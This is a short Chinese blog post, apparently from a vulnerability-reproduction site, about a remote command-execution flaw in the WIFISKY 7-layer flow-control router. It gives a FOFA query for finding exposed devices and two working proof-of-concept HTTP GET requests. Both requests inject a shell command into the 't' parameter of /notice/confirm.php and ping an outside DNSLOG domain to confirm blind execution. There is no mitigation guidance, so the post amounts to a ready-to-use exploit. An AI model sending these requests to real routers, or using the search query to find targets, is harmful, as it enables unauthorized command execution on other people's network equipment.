WIFISKY-7层流控路由器命令执行漏洞

67次阅读

共计 523 个字符，预计需要花费 2 分钟才能阅读完成。

漏洞描述

WIFISKY-7层流控路由器接口存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。

搜索引擎

FOFA:

app="WIFISKY-7层流控路由器"

漏洞复现

POC

结果是没有回显的，POC用延时或者DNSLOG演示

延时

GET /notice/confirm.php?t=;ping%20jqrlxrxgdc.yutu.eu.org.HTTP/1.1 
Host:ip:port
User-Agent:Mozi11a/5.0(WindowsNT10.0;Win64; -x64)AppleWebKit/537.36(KHTML, -1ikeGecko)Chrome/96.0.4664.93Safari/537.36

DNSlog

GET /notice/confirm.php?t=;ping%20jqrlxrxgdc.yutu.eu.org HTTP/1.1 
Host: ip:port
User-Agent:Mozi11a/5.0(WindowsNT10.0;Win64;-x64)AppleWebKit/537.36(KHTML, -1ikeGecko)Chrome/96.0.4664.93Safari/537.36

正文完

web安全漏洞复现网络安全

发表至：漏洞复现

2025-06-22

0

转载说明：除特殊说明外本站文章皆由CC-4.0协议发布，转载请注明出处。

会捷通云视讯系统 fileDownload 任意文件读取漏洞

WIFISKY-7层流控路由器 命令执行漏洞

漏洞描述

搜索引擎

漏洞复现

WIFISKY-7层流控路由器命令执行漏洞